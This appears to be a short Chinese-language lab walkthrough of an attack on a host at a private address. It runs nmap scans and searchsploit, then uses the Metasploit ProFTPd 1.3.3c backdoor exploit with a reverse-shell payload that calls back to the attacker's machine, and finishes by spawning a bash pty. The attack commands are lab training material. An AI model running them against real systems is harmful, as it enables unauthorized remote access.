信息探测
扫描主机服务信息以及服务版本
nmap -sV 192.168.101.49
快速扫描主机全部信息
nmap -T4 -A -v 192.168.101.49
发现漏洞
使用seachsploit查找漏洞信息
seachsploit 服务版本信息
使用metasploit进行远程溢出
进入msfconsole
sudo msfconsole
对版本漏洞进行搜索
search ProFTPd-1.3.3c
使用exploit
use exploit/unix/ftp/proftpd_133c_backdoor
查看可以使用的payload
show payload
设置payload
set payload cmd/unix/reverse
查看设置参数
show options
设置rhost
set rhost 192.168.101.49
设置lhost
set lhost 192.168.101.46
进行远程溢出
exploit
查看获得的权限
id
优化界面
python -c "import pty;pty.spawn('/bin/bash')"
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47